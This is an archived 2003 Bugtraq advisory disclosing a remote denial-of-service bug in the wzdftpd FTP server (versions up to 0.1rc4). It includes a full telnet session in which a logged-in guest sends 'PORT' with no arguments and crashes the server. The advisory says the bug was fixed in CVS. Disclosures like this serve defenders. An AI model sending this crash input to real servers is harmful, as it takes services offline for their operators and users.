wzdftpd remote DoS
From: Roman Bogorodskiy (bogorodskiy_at_inbox.ru)
Date: 06/27/03
- Previous message: Mandrake Linux Security Team: "MDKSA-2003:071 - Updated xpdf packages fix arbitrary code execution vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 27 Jun 2003 21:16:17 +0400 To: bugtraq@securityfocus.com
Title: wzdftpd remote DoS
Affected: wzdftpd <= 0.1rc4
URL: http://www.wzdftpd.net
Risk: High
Exploitable: Yes
Remote: Yes
Date: June, 27 2003
Overview:
"A portable, modular and efficient ftp server, supporting SSL,
winsock, multithreaded, modules ,externals scripts. unix-like
permissions+acls, virtual users/groups, security, speed, bandwith
limitation (user,group,global), group admins, per command auth"
Description:
wzdftpd crashes after sending command "PORT" w/out args.
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host
So, we see server is down.
Jun 11 23:00:33 fbd kernel: pid 7149 (lt-wzdftpd), uid 0: exited on signal 11 (core dumped)
This bug is fixed on June, 12 in a CVS version.
-Roman Bogorodskiy [Novel]
- Previous message: Mandrake Linux Security Team: "MDKSA-2003:071 - Updated xpdf packages fix arbitrary code execution vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
